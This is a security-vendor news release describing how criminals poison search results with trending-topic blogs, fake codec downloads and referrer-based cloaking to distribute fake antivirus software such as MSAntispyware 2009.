Panda Security has revealed that cyber-criminals are manipulating search engine results to distribute malware, in particular, fake antivirus products.
‘The reasons for this is simple – the criminals need to attract users to malicious sites in order to infect them,’ says Jeremy Matthews, head of Panda’s sub-Saharan operations. ‘What’s new, however, is the inventive ways they are drawing users to these Web pages.’
In the past, users were lured to compromised websites by means of massive sending of spam. Targeted users read emails, clicked on the links they included and were unwittingly directed to a malicious Web page. Now, there’s a change in strategy: due to the fact that users are more wary of messages received from unknown senders, criminals are using more effective ways of ensnaring new victims. They are using a Google tool called Google Trends which, among other things, lists the most popular searches of the day – anything from Obama’s inaugural address to the Oscar nominations).
Once they know the top searches and hot topics of the day, they create a blog full of the most searched for words (e.g. Obama, Penelope Cruz etc.) and videos supposedly related to these topics. This way, they increase the blog’s ranking to place it among users’ first search results.
“Users who trust these results will end up on a Web page where they will be asked to download a codec or plug-in, etc. in order to watch the video. If they do so, they will be downloading malware – in most cases a fake antivirus,” explains Matthews.
Fake antiviruses try to pass themselves off as real antivirus products to convince targeted users they have been infected by malicious codes. Victims are then prompted to buy the rogue antivirus to remove these bogus infections. Cyber-crooks are currently profiting substantially from this type of fraud.
This type of attack is benefiting from advanced SEO (Search Engine Optimization) techniques. These are legitimate Web programming techniques aimed at increasing the volume and quality of traffic to a website and improving its ranking in search engine results lists. This is the case of the webpage selling the Malwaredoctor fake antivirus, designed specifically to achieve a high ranking in search engines (for more info about this phenomenon click here).
In addition to standard SEO techniques, attackers are also using techniques known as “Black Hat SEO”, which could be described as illegal search engine positioning techniques used to by-pass search engine policies, present alternative content or affect the user’s experience. Occasionally, it can be difficult to determine which techniques are legitimate or not, as this can depend on the policies of the search engine.
Attackers are always keen to make malicious site identification for anti-malware vendors harder. In order to do this they are starting to use a more advanced way of launching these attacks. Some of the malicious pages they handle behave differently and show different content depending on the origin of the user that visits them.
In order to hide the attack, a script is inserted that determines the origin of the visitor. If a user types the URL they want to visit in the browser bar, the legitimate, correct content is displayed. However, if the user has come from a manipulated Google search, they will be taken to the malicious Web page.
MSAntispyware 2009: A different example
PandaLabs recently detected a Web page that appeared to establish a new model. While generally pages selling fake antiviruses either do not contain specific tags or those they contain are designed to improve indexing in search engines, the page from which MSAntispyware 2009 was distributed represented a significant change. Here, all the tags and processes were designed to prevent the page from being indexed in search engines.
The reason for this was to make it more difficult for malware analysts and security companies to prevent infections by techniques such as the blocking URLs through search engine queries with specific parameters.